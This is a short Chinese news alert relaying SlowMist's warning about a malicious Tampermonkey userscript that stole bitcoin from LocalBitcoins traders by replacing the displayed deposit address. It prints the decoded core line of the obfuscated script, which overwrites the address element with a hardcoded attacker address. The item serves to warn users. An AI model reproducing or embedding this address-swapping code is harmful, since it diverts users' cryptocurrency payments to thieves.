慢雾:警惕 Tampermonkey 扩展的恶意 JavaScript 插件劫持盗币攻击

币库消息,据慢雾区情报反馈,有人在 LocalBitcoins 进行交易时,被诱骗使用了一段所谓增强的 JavaScript 插件导致被盗比特币,该 JavaScript 插件可以在浏览器知名扩展 Tampermonkey (油猴)上方便使用。一旦使用,该恶意 JavaScript 即可篡改用户在 LocalBitcoins 上的比特币地址,达到劫持盗币攻击的目的。这段恶意 JavaScript 代码进行了多层加密与加花处理,肉眼看不出恶意行为,通过 xssor.io 进行解密后可以清晰看到「劫持盗币」的核心代码:document[_0x66e1x6(“0x0”)](“bitcoin-address bitcoin-address-controls”)[0][“innerHTML”] = “1Ak8db781gfM3QutGwFsKuZg7YeUEoCvPw。

上一篇:

下一篇:

QR code